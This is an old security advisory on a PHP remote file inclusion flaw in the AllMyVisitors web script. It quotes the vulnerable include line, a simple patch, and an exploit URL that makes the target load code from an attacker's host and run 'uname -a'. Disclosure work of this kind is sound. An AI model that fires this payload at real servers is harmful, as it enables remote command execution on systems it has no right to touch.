******** AllMyVisitors PHP Code Injection vulnerability ******** Product : AllMyVisitors Vendor : www.php-resource.net Date : February 14, 2004 Problem : PHP Code Injection Vendor Contacted ? : No ************************** Source **************************** in /include/info.inc.php -------------------------------------------------------------- $AMV_info_get = require_once("$_AMVconfig[cfg_serverpath]"."/include/template.inc.php"); -------------------------------------------------------------- ************************** Exploit *************************** http://[target]/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a in http://[attacker]/include/template.inc.php have : ------------------------ ------------------------ ************************** Impact **************************** Malicious user execute arbitrary commands on the server . ************************* Solution *************************** in /include/info.inc.php replace $AMV_info_get = require_once("$_AMVconfig[cfg_serverpath]"."/include/template.inc.php"); for if (isset($_AMVconfig[cfg_serverpath])){ die("Don\'t Hack it :)"); } $AMV_info_get = require_once("$_AMVconfig[cfg_serverpath]"."/include/template.inc.php"); ************************** Credits **************************** bnfx : bnfx@antisocial.com Mad_Skater : m4dsk4t3r@hotmail.com TechTeam Brazilian Crew .